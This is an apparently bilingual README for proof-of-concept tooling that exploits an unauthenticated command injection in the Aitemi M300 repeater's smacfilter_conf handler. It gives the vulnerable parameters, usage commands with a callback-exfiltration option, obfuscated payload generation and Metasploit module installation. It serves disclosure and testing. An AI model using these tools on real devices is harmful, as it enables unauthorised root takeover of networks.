
PoC tools for CVE-2026-58457: Unauthenticated OS Command Injection leading to remote root on Shenzhen Aitemi M300 Wi-Fi Repeater (MT02). Includes exploit, validator, payload generator, and Metasploit module. For educational and authorized pentesting only.
[!WARNING] このコードは教育および研究目的でのみ現状のまま提供されます。 本PoCを本番システム、共有環境、または無許可のターゲットに対して使用しないでください。
- このコードの実行またはホスティングは、誤用された場合にウイルス対策検出、セキュリティ監視アラート、または法的結果を引き起こす可能性があります。
- 著者およびリポジトリ保守者は、本コードに起因するいかなる損害、誤用、または違法行為についても一切の責任を負いません。
- 適切な許可を得た隔離されたラボ環境でのみ使用してください。 防御研究、脆弱性分析、ブルーチームテスト専用です。
smacfilter_conf ハンドラに認証不要のOSコマンドインジェクションの脆弱性が存在します。name、enable、mac の GET パラメータがサニタイズされずに sprintf() 呼び出しに渡され、root として実行される UCI コマンドを構築します。
poc.py - HTTPSサポート、リトライ、タイムアウト、コールバック流出機能を備えたフル機能のエクスプロイト。val.py - 安全で受動的な脆弱性検証ツール(無害な id コマンドを使用)。gen.py - 複数の難読化手法を備えた高度なペイロード生成ツール。MITIGATIONS.md - 推奨される防御策。exploit/ ディレクトリにあります。pip install requests
python3 val.py --target 192.168.1.100
python3 poc.py --target 192.168.1.100 --cmd "id"
python3 poc.py --target 192.168.1.100 --cmd "id" --callback http://your-ip:8080/
python3 gen.py -c "id" -n 10
cp ./aitemi_m300_smacfilter_rce.rb ~/.msf4/modules/exploits/linux/http/
# またはメインのMSFパス: /usr/share/metasploit-framework/modules/exploits/linux/http/
msfconsole -q -x "reload_all"
スターとコントリビューションを歓迎します - 特にバイパスの改善や追加ファームウェアバリアントへの対応。